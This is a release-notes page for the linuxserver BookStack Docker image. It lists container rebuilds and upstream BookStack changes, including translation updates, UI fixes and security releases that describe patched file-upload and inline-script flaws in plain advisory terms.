Releases: linuxserver/docker-bookstack
v0.26.1-ls41
LinuxServer Changes:
Rebase to Alpine 3.9, add MySQL init logic.
bookstack Changes:
This release contains the following fixes and changes:
- Updated Swedish translations. Thanks to @Hambern. (#1433)
- Updated Spanish translations. Thanks to @moucho. (#1420)
- Updated Ukrainian translations. Thanks to @Mant1kor. (#1419)
- Updated tabbing order on login forms to be consistent and as expected. (#1418)
- Fixed issue where "Toggle Details" Button does not properly save state when using the Guest user. (#1431)
- Fixed issue where editor image paste, and markdown drawing insert, would fail with an error. (#1428)
- Fixed styling of card headers on the 404 page. (#1427)
- Fixed issues where Book names could leak via the shelves listing when set as the homepage option. (#1425)
Special thanks to @Bolthier for providing many good, detailed, bug reports since yesterday's release.
v0.26.0-ls41
LinuxServer Changes:
Rebase to Alpine 3.9, add MySQL init logic.
bookstack Changes:
Links
Upgrade Notes
Internet Explorer Support - IE11 Support has now been dropped. We may support any critical issues for view-only scenarios otherwise please use a modern browser.
Translations - Since many interfaces and lines of text have been updated, It may take a little while for some translations to catch-up. Expect to see more English text than usual if you're using a non-English language option.
Images - Due to changes how images are handled, as detailed below, some types of images may become inaccessible. Old logo images will be deleted when changed. Unused Book/Shelf cover images & User profile images will be become inaccessible after the update so you may want to delete them before upgrade.
Security - On previous versions of BookStack it was possible for users to insert JavaScript via the Markdown editor using on* html attributes. These will now be removed on page render unless you have set ALLOW_CONTENT_SCRIPTS=true. If untrusted users has access to your BookStack you may want to scan for <<space_char>>on in the HTML column of the pages table to identify any malicious intent.
Full List of Changes
- Updated the application design for better mobile functionality and improved general UX. (#1153)
- Updated how profile, system & cover images are set & added extra permission checks on image actions. (#1410, #1307, #1128)
- Added the possibility to create a book directly within a shelf. Thanks to @cw1998. (#1366, #1260)
- Added sign-up link to login form and fixed differing name validation on sign-up. Thanks to @cw1998. (#1395, #1239)
- Added code block syntax highlight for OCaml, Haskell, Rust. Thanks to @XVilka. (#1344)
- Updated page content script escaping logic to strip inline JS event attributes. Thanks to @Xiphoseer for reporting.
- Updated revision restore to require confirmation and changed the method from GET so it's less likely to be accidentally triggered. (#1321)
- Updated shortcut used for markdown drawing manager to be cross-platform. (#1228)
- Updated Swedish translations. Thanks to @Hambern. (#1417)
- Fixed issue where duplicate ID's could sometimes break pages. (#1393)
- Fixed issue where user role assignments were not remembered, for roles with a dot in the name, on validation failure. Thanks to @cw1998. (#1392, #1325)
- Fixed issue where the port would be ignored if a full LDAP server URI was used. (#1386, #1278)
- Dropped IE11 support. (#1164)
v0.25.5-pkg-4001e764-ls40
LinuxServer Changes:
Rebase to Alpine 3.9, add MySQL init logic.
bookstack Changes:
Security Release
This release works on the changes from v0.25.4 and v0.25.3 to include additional security measures on file uploads.
For this release, Uploaded image files which have a name that includes more than a single extension are prevented from being uploaded since these could be used to upload executable files on some web-servers. In addition, Attachment uploads are now saved with randomly generated file names to make such upload operations safer to file name exploits.
Additional Changes
This release also contains the following translation updates:
v0.25.5-pkg-b16a636d-ls39
LinuxServer Changes:
Switching to new Base images, shift to arm32v7 tag.
bookstack Changes:
Security Release
This release works on the changes from v0.25.4 and v0.25.3 to include additional security measures on file uploads.
For this release, Uploaded image files which have a name that includes more than a single extension are prevented from being uploaded since these could be used to upload executable files on some web-servers. In addition, Attachment uploads are now saved with randomly generated file names to make such upload operations safer to file name exploits.
Additional Changes
This release also contains the following translation updates:
v0.25.5-pkg-9f541cff-ls38
LinuxServer Changes:
Switching to new Base images, shift to arm32v7 tag.
bookstack Changes:
Security Release
This release works on the changes from v0.25.4 and v0.25.3 to include additional security measures on file uploads.
For this release, Uploaded image files which have a name that includes more than a single extension are prevented from being uploaded since these could be used to upload executable files on some web-servers. In addition, Attachment uploads are now saved with randomly generated file names to make such upload operations safer to file name exploits.
Additional Changes
This release also contains the following translation updates:
v0.25.5-pkg-1eebeb22-ls37
LinuxServer Changes:
Switching to new Base images, shift to arm32v7 tag.
bookstack Changes:
Security Release
This release works on the changes from v0.25.4 and v0.25.3 to include additional security measures on file uploads.
For this release, Uploaded image files which have a name that includes more than a single extension are prevented from being uploaded since these could be used to upload executable files on some web-servers. In addition, Attachment uploads are now saved with randomly generated file names to make such upload operations safer to file name exploits.
Additional Changes
This release also contains the following translation updates:
v0.25.5-pkg-285ed901-ls36
LinuxServer Changes:
Switching to new Base images, shift to arm32v7 tag.
bookstack Changes:
Security Release
This release works on the changes from v0.25.4 and v0.25.3 to include additional security measures on file uploads.
For this release, Uploaded image files which have a name that includes more than a single extension are prevented from being uploaded since these could be used to upload executable files on some web-servers. In addition, Attachment uploads are now saved with randomly generated file names to make such upload operations safer to file name exploits.
Additional Changes
This release also contains the following translation updates:
v0.25.4-pkg-285ed901-ls36
LinuxServer Changes:
Switching to new Base images, shift to arm32v7 tag.
bookstack Changes:
Security Release
This release patches a security vulnerability that allowed PHP files, using a non-.php extension, to be uploaded via image upload endpoints. The PHP files could then be called externally to perform malicious activity.
This is a continuation upon the security updates enforced in v0.25.3. Please see that release for further information on this kind of vulnerability.
This update applies a whitelist to file extensions for uploaded images to ensure php-like files, such as .phtml or .php3, cannot exploit web servers that execute such files.
v0.25.4-pkg-a9e285e4-ls35
LinuxServer Changes:
Added php7-curl
bookstack Changes:
Security Release
This release patches a security vulnerability that allowed PHP files, using a non-.php extension, to be uploaded via image upload endpoints. The PHP files could then be called externally to perform malicious activity.
This is a continuation upon the security updates enforced in v0.25.3. Please see that release for further information on this kind of vulnerability.
This update applies a whitelist to file extensions for uploaded images to ensure php-like files, such as .phtml or .php3, cannot exploit web servers that execute such files.
v0.25.3-pkg-a9e285e4-ls35
LinuxServer Changes:
Added php7-curl
bookstack Changes:
Security Release
This release patches a security vulnerability that allowed PHP files to be uploaded via image upload endpoints. The PHP files could then be called externally to perform malicious activity.
This is particularly an issue in environments where untrusted users have the necessary permissions to upload images.
Please consider that malicious exploitation of this vulnerability may have allowed access to other files on your server that the PHP process has access to, Including your BookStack .env file, so consider updating any passwords or keys if you think this had a possibility of being exploited on your instance.
It is advised you update your BookStack instance as soon as possible.